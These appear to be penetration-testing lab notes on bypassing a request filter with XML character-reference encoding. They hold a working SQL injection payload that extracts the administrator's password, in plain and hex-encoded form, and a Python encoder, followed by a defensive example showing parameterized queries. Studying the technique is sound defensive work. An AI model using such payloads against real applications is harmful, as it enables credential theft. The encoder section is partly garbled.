## XML
**Steps**
- Capture the request in Burp Suite (the request body carries some XML)
- Find the number of columns (you can simply guess it from the output of the original request)
- When trying to bypass a filter, you might find that simply URL-encoding the payload does not work. This is because XML uses its own encoding, character references (more information ---> [HERE](https://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references))
- So here we are encoding characters as XML character references (this is different from simple URL encoding)
- Using (HARACTER;), we can see that SQL injection is valid
Query Example

```
# Not encoded
4 UNION SELECT password FROM users WHERE username='administrator'--

# Encoded (every character as a hex numeric character reference, &#xHH;)
&#x34;&#x20;&#x55;&#x4e;&#x49;&#x4f;&#x4e;&#x20;&#x53;&#x45;&#x4c;&#x45;&#x43;&#x54;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6f;&#x72;&#x64;&#x20;&#x46;&#x52;&#x4f;&#x4d;&#x20;&#x75;&#x73;&#x65;&#x72;&#x73;&#x20;&#x57;&#x48;&#x45;&#x52;&#x45;&#x20;&#x75;&#x73;&#x65;&#x72;&#x6e;&#x61;&#x6d;&#x65;&#x3d;&#x27;&#x61;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x27;&#x2d;&#x2d;
```
## Tool (Python)
XML encoder (can be modified to encode other characters)
```python
import xml.sax.saxutils

# Define the string to be encoded
string = "this is a string to be XML encoded"

# Encode the string using escape(). escape() always replaces "&", "<" and ">"
# itself (with &amp; &lt; &gt;), so those must NOT be listed again in the
# entities dict: a second "&" mapping would turn "&amp;" into "&amp;amp;".
# The dict only adds the extra characters we want turned into references.
encoded_string = xml.sax.saxutils.escape(string, {
    "'": "&apos;",   # Single quote
    '"': "&quot;",   # Double quote
    " ": "&#x20;",   # Space as a numeric reference (assumed target; the original mapping did not survive rendering)
})

# Print the encoded string
print(encoded_string)
```
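The two passages above (the character-reference bypass in the Steps, and the encoder tool) describe one mechanism: a filter that inspects the raw request body sees only `&#x..;` sequences, but the XML parser decodes them before the value reaches the SQL layer. The following added example (not part of the original notes) shows both halves in Python's standard library: a numeric-reference encoder like the tool above, a keyword check run on the raw bytes versus the parsed value, and a parameterized query that treats the decoded value purely as data. The `stockCheck`/`storeId` request shape, the `stock` table and the keyword list are constructed for the demo and are assumptions, not taken from the notes.

```python
import sqlite3
import xml.etree.ElementTree as ET


def xml_numeric_encode(text: str, hexadecimal: bool = True) -> str:
    """Encode every character of `text` as an XML numeric character reference.

    hexadecimal=True gives &#xHH; references, False gives decimal &#NN; ones.
    Both forms are decoded identically by any conforming XML parser.
    """
    if hexadecimal:
        return "".join(f"&#x{ord(c):x};" for c in text)
    return "".join(f"&#{ord(c)};" for c in text)


# Constructed keyword list for a naive request filter (assumption for the demo).
KEYWORDS = ("UNION", "SELECT")


def keyword_filter(value: str) -> bool:
    """Naive blocklist check: True means the filter would block this value."""
    upper = value.upper()
    return any(k in upper for k in KEYWORDS)


def build_request(store_id: str) -> str:
    """Constructed XML body in the shape of a stock-check request (assumed format)."""
    return (
        '<?xml version="1.0"?>'
        "<stockCheck><productId>1</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )


def parsed_store_id(raw_xml: str) -> str:
    """What the application actually receives: the parser has decoded the references."""
    return ET.fromstring(raw_xml).findtext("storeId")


def lookup_stock_safely(store_id: str) -> list:
    """Parameterized lookup: the decoded value is bound as data, never spliced into SQL.

    Uses a constructed in-memory table so the example runs offline.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stock (store_id TEXT, units INTEGER)")
    conn.executemany("INSERT INTO stock VALUES (?, ?)", [("1", 10), ("4", 7)])
    rows = conn.execute(
        "SELECT units FROM stock WHERE store_id = ?", (store_id,)
    ).fetchall()
    conn.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    encoded = xml_numeric_encode("4 UNION SELECT 1")
    raw = build_request(encoded)
    decoded = parsed_store_id(raw)
    print("raw body blocked?   ", keyword_filter(raw))      # False: filter sees only &#x..;
    print("parsed value blocked?", keyword_filter(decoded))  # True: check after parsing
    print("safe lookup result:  ", lookup_stock_safely(decoded))  # []: bound as literal text
```

The defensive takeaway is in the last two calls: any inspection has to run on the value after XML parsing (or, better, the parsed value must never be concatenated into SQL at all), since a check on the raw body is looking at a representation the database will never see.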